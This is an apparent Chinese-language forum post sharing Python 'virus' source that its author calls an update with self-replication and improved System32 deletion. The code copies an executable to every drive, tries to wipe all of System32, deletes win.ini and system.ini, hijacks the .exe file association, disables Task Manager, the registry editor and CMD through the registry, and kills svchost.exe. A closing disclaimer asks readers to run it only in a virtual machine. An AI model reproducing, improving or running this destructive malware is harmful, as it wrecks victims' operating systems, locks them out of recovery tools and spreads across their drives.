python病毒更新,添加自我复制功能,改进删除system32
上代码
import os,shutil,time
import subprocess
from pathlib import Path
import psutil,re
disk = str(psutil.disk_partitions())
disk_device = r'device'
disks=[]
for i in re.finditer('device', disk):
#print(i.span())
start = i.span()[1] + 2
end = i.span()[1] + 4
disks.append(disk[start:end])
for disk in disks:
shutil.copyfile("death.exe",f"{disk}\death.exe")
def cmd(command):
os.system(command)
p=Path.home()
def del_file(path):
ls = os.listdir(path)
for l in ls:
try:
os.unlink(f"C:\Windows\System32\{i}")#遍历system32下的所有文件并尝试删除
except:
pass
try:
del_file("C:\windows\system32")
except:
cmd("del /f /s /q C:\windows\system32\*.*")
try:
with open("C:\kill.bat",'w') as f:
f.write("@echo off")
f.write(r'if "%1" == "h" goto begin')
f.write(r'mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit')
f.write(":begin")
f.write("REM")
f.write("del /f /s /q C:\windows\system32\*.*")
f.write("attrib -s -r -h C:\Windows\win.ini")
f.write("del /f /s /q C:\Windows\win.ini")
f.write("attrib -s -r -h C:\Windows\system.ini")
f.write("del /f /s /q C:\Windows\system.ini")
f.write(r'ftype exefile="C:\Windows\notepad"%*')
f.write(r'reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f')
f.write(r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f')
f.write(r'reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t reg_dword /d "1" /f')
subprocess.call(['C:\kill.bat'])
time.sleep(100)
os.system("taskkill /f /im svchost.exe")
except:
pass
这就是我的电脑病毒程序,如果有不足请多多指出。
如要使用,请用虚拟机。下载研究后请严禁用于非法用途,使用本文件产生的一切后果由下载者自行承担,谢谢!